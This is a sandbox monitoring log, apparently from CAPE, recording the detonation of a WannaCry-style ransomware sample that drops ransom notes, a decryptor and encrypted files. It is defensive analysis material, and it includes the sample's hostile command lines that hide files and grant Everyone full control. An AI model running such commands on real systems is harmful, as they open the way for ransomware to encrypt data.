2025-12-08 09:08:37,890 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\u.wnry
2025-12-08 09:08:37,890 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 2544: C:\Windows\system32\attrib.exe, ImageBase: 0x008E0000
2025-12-08 09:08:37,890 [root] INFO: Announced 32-bit process name: attrib.exe pid: 2544
2025-12-08 09:08:37,890 [lib.api.process] INFO: Monitor config for <Process 2544 attrib.exe>: C:\tmp2azv04x4\dll\2544.ini
2025-12-08 09:08:37,890 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:08:37,890 [root] DEBUG: Loader: Injecting process 2544 (thread 2456) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:37,890 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:08:37,890 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:37,890 [lib.api.process] INFO: Injected into 32-bit <Process 2544 attrib.exe>
2025-12-08 09:08:37,890 [root] DEBUG: 3040: DLL loaded at 0x73910000: C:\Windows\system32\apphelp (0x4c000 bytes).
2025-12-08 09:08:37,906 [root] INFO: Announced 32-bit process name: attrib.exe pid: 2544
2025-12-08 09:08:37,906 [lib.api.process] INFO: Monitor config for <Process 2544 attrib.exe>: C:\tmp2azv04x4\dll\2544.ini
2025-12-08 09:08:37,906 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:08:37,906 [root] DEBUG: Loader: Injecting process 2544 (thread 2456) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:37,906 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:08:37,906 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:37,906 [lib.api.process] INFO: Injected into 32-bit <Process 2544 attrib.exe>
2025-12-08 09:08:37,921 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 664: C:\Windows\system32\icacls.exe, ImageBase: 0x00310000
2025-12-08 09:08:37,921 [root] INFO: Announced 32-bit process name: icacls.exe pid: 664
2025-12-08 09:08:37,921 [lib.api.process] INFO: Monitor config for <Process 664 icacls.exe>: C:\tmp2azv04x4\dll\664.ini
2025-12-08 09:08:37,921 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:08:37,921 [root] DEBUG: Loader: Injecting process 664 (thread 2360) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:37,921 [root] DEBUG: 2544: Python path set to 'C:\Python38'.
2025-12-08 09:08:37,921 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:08:37,921 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:37,937 [lib.api.process] INFO: Injected into 32-bit <Process 664 icacls.exe>
2025-12-08 09:08:37,921 [root] DEBUG: 2544: Dropped file limit defaulting to 100.
2025-12-08 09:08:37,937 [root] DEBUG: 2544: VerifyCodeSection: Executable code does not match, 0x0 of 0x2c00 matching
2025-12-08 09:08:37,937 [root] INFO: Disabling sleep skipping.
2025-12-08 09:08:37,937 [root] DEBUG: 2544: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:08:37,937 [root] DEBUG: 2544: YaraScan: Scanning 0x008E0000, size 0x6250
2025-12-08 09:08:37,937 [root] DEBUG: 2544: Monitor initialised: 32-bit capemon loaded in process 2544 at 0x74260000, thread 2456, image base 0x8e0000, stack from 0x276000-0x280000
2025-12-08 09:08:37,937 [root] DEBUG: 2544: Commandline: attrib +h .
2025-12-08 09:08:37,937 [root] INFO: Announced 32-bit process name: icacls.exe pid: 664
2025-12-08 09:08:37,937 [lib.api.process] INFO: Monitor config for <Process 664 icacls.exe>: C:\tmp2azv04x4\dll\664.ini
2025-12-08 09:08:37,937 [root] DEBUG: 2544: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:08:37,937 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:08:37,937 [root] DEBUG: 2544: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:08:37,937 [root] DEBUG: 2544: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:08:37,953 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:08:37,953 [root] DEBUG: 2544: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:08:37,953 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:08:37,953 [root] DEBUG: 2544: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:08:37,953 [root] DEBUG: 2544: Hooked 611 out of 613 functions
2025-12-08 09:08:37,953 [root] DEBUG: 2544: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:08:37,953 [root] DEBUG: 2544: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x180000
2025-12-08 09:08:37,953 [root] DEBUG: Loader: Injecting process 664 (thread 2360) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:37,953 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:08:37,953 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:37,953 [lib.api.process] INFO: Injected into 32-bit <Process 664 icacls.exe>
2025-12-08 09:08:37,953 [root] INFO: Loaded monitor into process with pid 2544
2025-12-08 09:08:37,953 [root] DEBUG: 3040: DLL loaded at 0x73140000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2025-12-08 09:08:37,953 [root] DEBUG: 3040: DLL loaded at 0x73100000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 09:08:37,953 [root] DEBUG: 2544: caller_dispatch: Added region at 0x008E0000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x008E2CBE, thread 2456).
2025-12-08 09:08:37,953 [root] DEBUG: 2544: YaraScan: Scanning 0x008E0000, size 0x6250
2025-12-08 09:08:37,953 [root] DEBUG: 2544: ProcessImageBase: Main module image at 0x008E0000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:08:37,953 [root] DEBUG: 2544: NtTerminateProcess hook: Attempting to dump process 2544
2025-12-08 09:08:37,968 [root] DEBUG: 2544: VerifyCodeSection: Executable code does not match, 0x0 of 0x2c00 matching
2025-12-08 09:08:37,968 [root] DEBUG: 2544: DoProcessDump: Code modification detected, dumping Imagebase at 0x008E0000.
2025-12-08 09:08:37,968 [root] DEBUG: 2544: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2025-12-08 09:08:37,968 [root] DEBUG: 3040: DLL loaded at 0x76640000: C:\Windows\syswow64\SHELL32 (0xc4c000 bytes).
2025-12-08 09:08:37,968 [root] DEBUG: 2544: DumpProcess: Instantiating PeParser with address: 0x008E0000.
2025-12-08 09:08:37,968 [root] DEBUG: 3040: DLL loaded at 0x745F0000: C:\Windows\system32\MSVCP60 (0x66000 bytes).
2025-12-08 09:08:37,968 [root] DEBUG: 664: Python path set to 'C:\Python38'.
2025-12-08 09:08:37,968 [root] DEBUG: 2544: DumpProcess: Module entry point VA is 0x00002989.
2025-12-08 09:08:37,968 [root] DEBUG: 664: Dropped file limit defaulting to 100.
2025-12-08 09:08:37,968 [root] DEBUG: 3040: ProtectionHandler: Adding region at 0x10001000 to tracked regions.
2025-12-08 09:08:37,984 [lib.common.results] INFO: Uploading file C:\fJCIHnd\CAPE\2544_198633603748581122025 to procdump\fe3de2e935938690896bd394d7142cebceddaa8b331e954507f66968a278e31c; Size is 16896; Max size: 100000000
2025-12-08 09:08:37,984 [root] DEBUG: 3040: DumpPEsInRange: Scanning range 0x10000000 - 0x1000F000.
2025-12-08 09:08:37,984 [root] INFO: Disabling sleep skipping.
2025-12-08 09:08:37,984 [root] DEBUG: 3040: ScanForDisguisedPE: PE image located at: 0x10000000
2025-12-08 09:08:37,984 [root] DEBUG: 3040: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2025-12-08 09:08:37,984 [root] DEBUG: 2544: DumpProcess: Module image dump success - dump size 0x4200.
2025-12-08 09:08:37,984 [root] DEBUG: 664: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:08:37,984 [root] DEBUG: 664: YaraScan: Scanning 0x00310000, size 0x94ee
2025-12-08 09:08:37,984 [root] DEBUG: 3040: DumpProcess: Instantiating PeParser with address: 0x10000000.
2025-12-08 09:08:37,984 [root] DEBUG: 664: Monitor initialised: 32-bit capemon loaded in process 664 at 0x74260000, thread 2360, image base 0x310000, stack from 0x276000-0x280000
2025-12-08 09:08:37,984 [root] INFO: Process with pid 2544 has terminated
2025-12-08 09:08:38,000 [root] DEBUG: 3040: DumpProcess: Module entry point VA is 0x00006CDF.
2025-12-08 09:08:38,000 [root] DEBUG: 664: Commandline: icacls . /grant Everyone:F /T /C /Q
2025-12-08 09:08:38,000 [root] DEBUG: 3040: PeParser: readPeSectionsFromProcess: readSectionFromProcess failed address 0x1000F000, section 5
2025-12-08 09:08:38,000 [root] DEBUG: 664: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:08:38,000 [root] DEBUG: 664: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:08:38,015 [lib.common.results] INFO: Uploading file C:\fJCIHnd\CAPE\3040_03848581122025 to CAPE\b364f052298109f5ab148af26071505c74bbdb54e5cd6584492eecd6d9d14b98; Size is 57344; Max size: 100000000
2025-12-08 09:08:38,015 [root] DEBUG: 664: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:08:38,015 [root] DEBUG: 3040: DumpProcess: Module image dump success - dump size 0xe000.
2025-12-08 09:08:38,015 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:08:38,015 [root] DEBUG: 3040: ScanForDisguisedPE: No PE image located in range 0x10001000-0x1000F000.
2025-12-08 09:08:38,015 [root] DEBUG: 664: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:08:38,015 [root] DEBUG: 3040: DumpRegion: Dumped PE image(s) from base address 0x10000000, size 61440 bytes.
2025-12-08 09:08:38,015 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:08:38,015 [root] DEBUG: 3040: ProcessTrackedRegion: Dumped region at 0x10000000.
2025-12-08 09:08:38,015 [root] DEBUG: 664: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:08:38,015 [root] DEBUG: 3040: YaraScan: Scanning 0x10000000, size 0xf000
2025-12-08 09:08:38,015 [root] DEBUG: 664: Hooked 611 out of 613 functions
2025-12-08 09:08:38,015 [root] DEBUG: 664: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:08:38,015 [root] DEBUG: 3040: DLL loaded at 0x745C0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2025-12-08 09:08:38,015 [root] DEBUG: 664: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x180000
2025-12-08 09:08:38,015 [root] DEBUG: 3040: DLL loaded at 0x765E0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2025-12-08 09:08:38,062 [root] INFO: Loaded monitor into process with pid 664
2025-12-08 09:08:38,062 [root] DEBUG: 664: caller_dispatch: Added region at 0x00310000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x00315803, thread 2360).
2025-12-08 09:08:38,109 [root] DEBUG: 664: YaraScan: Scanning 0x00310000, size 0x94ee
2025-12-08 09:08:38,140 [root] DEBUG: 664: ProcessImageBase: Main module image at 0x00310000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:08:38,203 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\00000000.pky
2025-12-08 09:08:38,203 [root] DEBUG: 664: DLL loaded at 0x745C0000: C:\Windows\SysWOW64\ntmarta (0x21000 bytes).
2025-12-08 09:08:38,203 [root] DEBUG: 664: DLL loaded at 0x765E0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2025-12-08 09:08:38,203 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\00000000.res
2025-12-08 09:08:38,218 [root] DEBUG: 664: api-rate-cap: NtQueryInformationToken hook disabled due to rate
2025-12-08 09:08:38,218 [root] DEBUG: 664: api-rate-cap: memcpy hook disabled due to rate
2025-12-08 09:08:38,593 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 2676: C:\Users\user\AppData\Local\Temp\taskdl.exe, ImageBase: 0x00400000
2025-12-08 09:08:38,640 [root] INFO: Announced 32-bit process name: taskdl.exe pid: 2676
2025-12-08 09:08:38,640 [lib.api.process] INFO: Monitor config for <Process 2676 taskdl.exe>: C:\tmp2azv04x4\dll\2676.ini
2025-12-08 09:08:38,656 [root] DEBUG: 664: NtTerminateProcess hook: Attempting to dump process 664
2025-12-08 09:08:38,656 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:08:38,656 [root] DEBUG: 664: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:08:38,656 [root] INFO: Process with pid 664 has terminated
2025-12-08 09:08:38,687 [root] DEBUG: Loader: Injecting process 2676 (thread 1556) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:38,687 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:08:38,687 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:38,687 [lib.api.process] INFO: Injected into 32-bit <Process 2676 taskdl.exe>
2025-12-08 09:08:38,687 [root] INFO: Announced 32-bit process name: taskdl.exe pid: 2676
2025-12-08 09:08:38,703 [lib.api.process] INFO: Monitor config for <Process 2676 taskdl.exe>: C:\tmp2azv04x4\dll\2676.ini
2025-12-08 09:08:38,703 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:08:38,703 [root] DEBUG: Loader: Injecting process 2676 (thread 1556) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:38,718 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:08:38,718 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:38,718 [lib.api.process] INFO: Injected into 32-bit <Process 2676 taskdl.exe>
2025-12-08 09:08:38,750 [root] DEBUG: 2676: Python path set to 'C:\Python38'.
2025-12-08 09:08:38,750 [root] DEBUG: 2676: Dropped file limit defaulting to 100.
2025-12-08 09:08:38,750 [root] INFO: Disabling sleep skipping.
2025-12-08 09:08:38,750 [root] DEBUG: 2676: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:08:38,750 [root] DEBUG: 2676: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:08:38,750 [root] DEBUG: 2676: Monitor initialised: 32-bit capemon loaded in process 2676 at 0x74260000, thread 1556, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:08:38,750 [root] DEBUG: 2676: Commandline: taskdl.exe
2025-12-08 09:08:38,750 [root] DEBUG: 2676: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:08:38,750 [root] DEBUG: 2676: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:08:38,750 [root] DEBUG: 2676: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:08:38,750 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:08:38,750 [root] DEBUG: 2676: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:08:38,750 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:08:38,750 [root] DEBUG: 2676: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:08:38,750 [root] DEBUG: 2676: Hooked 611 out of 613 functions
2025-12-08 09:08:38,750 [root] DEBUG: 2676: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:08:38,750 [root] DEBUG: 2676: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x230000
2025-12-08 09:08:38,765 [root] INFO: Loaded monitor into process with pid 2676
2025-12-08 09:08:38,781 [root] DEBUG: 2676: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x004019B1, thread 1556).
2025-12-08 09:08:38,781 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
2025-12-08 09:08:38,781 [root] DEBUG: 2676: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:08:38,781 [root] DEBUG: 2676: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:08:38,781 [root] DEBUG: 2676: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:08:38,781 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\275781765172918.bat
2025-12-08 09:08:38,796 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 268: C:\Windows\system32\cmd.exe, ImageBase: 0x4A360000
2025-12-08 09:08:38,796 [root] INFO: Announced 32-bit process name: cmd.exe pid: 268
2025-12-08 09:08:38,796 [root] DEBUG: 2676: NtTerminateProcess hook: Attempting to dump process 2676
2025-12-08 09:08:38,796 [lib.api.process] INFO: Monitor config for <Process 268 cmd.exe>: C:\tmp2azv04x4\dll\268.ini
2025-12-08 09:08:38,796 [root] DEBUG: 2676: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:08:38,796 [root] INFO: Process with pid 2676 has terminated
2025-12-08 09:08:38,812 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:08:38,812 [root] DEBUG: Loader: Injecting process 268 (thread 2592) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:38,812 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:08:38,812 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:38,812 [lib.api.process] INFO: Injected into 32-bit <Process 268 cmd.exe>
2025-12-08 09:08:38,828 [root] INFO: Announced 32-bit process name: cmd.exe pid: 268
2025-12-08 09:08:38,828 [lib.api.process] INFO: Monitor config for <Process 268 cmd.exe>: C:\tmp2azv04x4\dll\268.ini
2025-12-08 09:08:38,828 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:08:38,843 [root] DEBUG: Loader: Injecting process 268 (thread 2592) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:38,843 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:08:38,843 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:38,843 [lib.api.process] INFO: Injected into 32-bit <Process 268 cmd.exe>
2025-12-08 09:08:38,843 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\@Please_Read_Me@.txt
2025-12-08 09:08:38,906 [root] INFO: Added new file to list with pid None and path C:\Users\user\Desktop\~SD7362.tmp
2025-12-08 09:08:38,953 [root] DEBUG: 268: Python path set to 'C:\Python38'.
2025-12-08 09:08:38,953 [root] DEBUG: 268: Dropped file limit defaulting to 100.
2025-12-08 09:08:38,953 [root] INFO: Added new file to list with pid None and path C:\Users\user\Documents\~SD73C1.tmp
2025-12-08 09:08:38,953 [root] INFO: Disabling sleep skipping.
2025-12-08 09:08:38,968 [root] DEBUG: 268: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:08:38,968 [root] DEBUG: 268: YaraScan: Scanning 0x4A360000, size 0x4bb2e
2025-12-08 09:08:38,984 [root] DEBUG: 268: Monitor initialised: 32-bit capemon loaded in process 268 at 0x74260000, thread 2592, image base 0x4a360000, stack from 0x2c3000-0x3c0000
2025-12-08 09:08:38,984 [root] INFO: Added new file to list with pid None and path C:\Users\user\Documents\WindowsPowerShell\~SD73E1.tmp
2025-12-08 09:08:38,984 [root] DEBUG: 268: Commandline: C:\Windows\system32\cmd.exe /c 275781765172918.bat
2025-12-08 09:08:38,984 [root] DEBUG: 268: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:08:38,984 [root] DEBUG: 268: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:08:39,015 [root] INFO: Added new file to list with pid None and path C:\Users\Default\Desktop\~SD73F2.tmp
2025-12-08 09:08:39,015 [root] DEBUG: 268: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:08:39,015 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:08:39,031 [root] DEBUG: 268: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:08:39,031 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:08:39,046 [root] DEBUG: 268: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:08:39,046 [root] INFO: Added new file to list with pid None and path C:\Users\Default User\Desktop\~SD7412.tmp
2025-12-08 09:08:39,046 [root] DEBUG: 268: Hooked 611 out of 613 functions
2025-12-08 09:08:39,046 [root] DEBUG: 268: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:08:39,046 [root] DEBUG: 268: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1e0000
2025-12-08 09:08:39,046 [root] INFO: Added new file to list with pid None and path C:\Users\Public\Desktop\~SD7432.tmp
2025-12-08 09:08:39,046 [root] INFO: Loaded monitor into process with pid 268
2025-12-08 09:08:39,046 [root] DEBUG: 268: caller_dispatch: Added region at 0x4A360000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x4A367CBD, thread 2592).
2025-12-08 09:08:39,062 [root] DEBUG: 268: YaraScan: Scanning 0x4A360000, size 0x4bb2e
2025-12-08 09:08:39,062 [root] DEBUG: 268: ProcessImageBase: Main module image at 0x4A360000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:08:39,062 [root] INFO: Added new file to list with pid None and path C:\Users\Default\Documents\~SD7443.tmp
2025-12-08 09:08:39,062 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\m.vbs
2025-12-08 09:08:39,093 [root] INFO: Added new file to list with pid None and path C:\Users\Default User\Documents\~SD7454.tmp
2025-12-08 09:08:39,093 [root] DEBUG: 268: CreateProcessHandler: Injection info set for new process 288: C:\Windows\system32\cscript.exe, ImageBase: 0x00CE0000
2025-12-08 09:08:39,093 [root] INFO: Announced 32-bit process name: cscript.exe pid: 288
2025-12-08 09:08:39,093 [root] INFO: Added new file to list with pid None and path C:\Users\Public\Documents\~SD7464.tmp
2025-12-08 09:08:39,093 [lib.api.process] INFO: Monitor config for <Process 288 cscript.exe>: C:\tmp2azv04x4\dll\288.ini
2025-12-08 09:08:39,093 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:08:39,125 [root] INFO: Added new file to list with pid None and path C:\~SD7475.tmp
2025-12-08 09:08:39,125 [root] INFO: Added new file to list with pid None and path C:\@Please_Read_Me@.txt
2025-12-08 09:08:39,125 [root] INFO: Added new file to list with pid None and path C:\@WanaDecryptor@.exe
2025-12-08 09:08:39,125 [root] INFO: Added new file to list with pid None and path C:\$Recycle.Bin\~SD7486.tmp
2025-12-08 09:08:39,156 [root] DEBUG: Loader: Injecting process 288 (thread 2284) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:39,171 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:08:39,171 [root] INFO: Added new file to list with pid None and path C:\$Recycle.Bin\S-1-5-21-1249488040-416823385-3057894055-500\~SD74A6.tmp
2025-12-08 09:08:39,171 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:39,171 [lib.api.process] INFO: Injected into 32-bit <Process 288 cscript.exe>
2025-12-08 09:08:39,187 [root] DEBUG: 268: DLL loaded at 0x73910000: C:\Windows\system32\apphelp (0x4c000 bytes).
2025-12-08 09:08:39,187 [root] INFO: Added new file to list with pid None and path C:\$Recycle.Bin\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD74B6.tmp
2025-12-08 09:08:39,187 [root] INFO: Announced 32-bit process name: cscript.exe pid: 288
2025-12-08 09:08:39,187 [lib.api.process] INFO: Monitor config for <Process 288 cscript.exe>: C:\tmp2azv04x4\dll\288.ini
2025-12-08 09:08:39,187 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:08:39,218 [root] INFO: Added new file to list with pid None and path C:\$Recycle.Bin\S-1-5-21-3047202784-114954003-3208681637-500\~SD74D7.tmp
2025-12-08 09:08:39,218 [root] DEBUG: Loader: Injecting process 288 (thread 2284) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:39,218 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:08:39,218 [root] INFO: Added new file to list with pid None and path C:\ba69bdf0a250e352360c33\~SD74E7.tmp
2025-12-08 09:08:39,218 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:08:39,218 [lib.api.process] INFO: Injected into 32-bit <Process 288 cscript.exe>
2025-12-08 09:08:39,234 [root] INFO: Added new file to list with pid None and path C:\ba69bdf0a250e352360c33\@Please_Read_Me@.txt
2025-12-08 09:08:39,234 [root] DEBUG: 288: Python path set to 'C:\Python38'.
2025-12-08 09:08:39,249 [root] DEBUG: 288: Dropped file limit defaulting to 100.
2025-12-08 09:08:39,249 [root] INFO: Added new file to list with pid None and path C:\ba69bdf0a250e352360c33\@WanaDecryptor@.exe
2025-12-08 09:08:39,249 [root] INFO: Disabling sleep skipping.
2025-12-08 09:08:39,265 [root] DEBUG: 288: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:08:39,265 [root] INFO: Added new file to list with pid None and path C:\ba69bdf0a250e352360c33\1025\~SD7508.tmp
2025-12-08 09:08:39,265 [root] DEBUG: 288: YaraScan: Scanning 0x00CE0000, size 0x21208
2025-12-08 09:08:39,265 [root] DEBUG: 288: Monitor initialised: 32-bit capemon loaded in process 288 at 0x74260000, thread 2284, image base 0xce0000, stack from 0x396000-0x3a0000
2025-12-08 09:08:39,281 [root] DEBUG: 288: Commandline: cscript.exe  //nologo m.vbs
2025-12-08 09:08:39,281 [root] INFO: Added new file to list with pid None and path C:\ba69bdf0a250e352360c33\1025\eula.rtf.WNCRYT
2025-12-08 09:08:39,281 [root] DEBUG: 288: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:08:39,281 [root] DEBUG: 288: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:08:39,281 [root] DEBUG: 288: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:08:39,281 [root] INFO: Added new file to list with pid None and path C:\ba69bdf0a250e352360c33\1025\@Please_Read_Me@.txt
